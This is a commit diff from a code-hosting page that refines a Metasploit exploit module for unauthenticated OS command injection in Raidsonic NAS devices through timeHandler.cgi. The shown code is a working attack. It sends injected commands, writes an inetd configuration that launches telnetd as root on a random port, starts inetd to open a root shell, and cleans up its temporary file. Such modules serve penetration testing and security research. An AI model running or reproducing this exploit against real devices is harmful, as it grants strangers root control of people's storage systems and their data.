feedback included
m-1-k-3
parent
b8ed364cb8
commit
34134b2e11
|
|
@ -12,12 +12,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::CommandShell
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
Different Raidsonic NAS devices are vulnerable to OS command injection via the web
|
||||
Different Raidsonic NAS devices are vulnerable to OS command injection via the web
|
||||
interface. The vulnerability exists in timeHandler.cgi, which is accessible without
|
||||
authentication. This module has been tested with the versions IB-NAS5220 and
|
||||
IB-NAS4220.
|
||||
|
|
@ -64,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
if target.name =~ /CMD/
|
||||
exploit_cmd
|
||||
else
|
||||
|
|
@ -75,11 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if not (datastore['CMD'])
|
||||
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
||||
end
|
||||
response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
print_status("#{rhost}:#{rport} - Sending remote command")
|
||||
res = request(payload.encoded)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
|
@ -91,8 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit_telnet
|
||||
telnetport = rand(65535)
|
||||
|
||||
response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||
|
||||
#first request
|
||||
|
|
@ -102,29 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
#second request
|
||||
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/inetd.conf"
|
||||
inetd_cfg = rand_text_alpha(8)
|
||||
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
|
||||
cmd = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} - sending second request - configure inetd")
|
||||
register_file_for_cleanup("/tmp/#{inetd_cfg}")
|
||||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
#third request
|
||||
cmd = "/usr/sbin/inetd /tmp/inetd.conf"
|
||||
cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
|
||||
cmd = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
|
||||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
|
@ -136,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
begin
|
||||
|
|
|
|||
Loading…
Reference in New Issue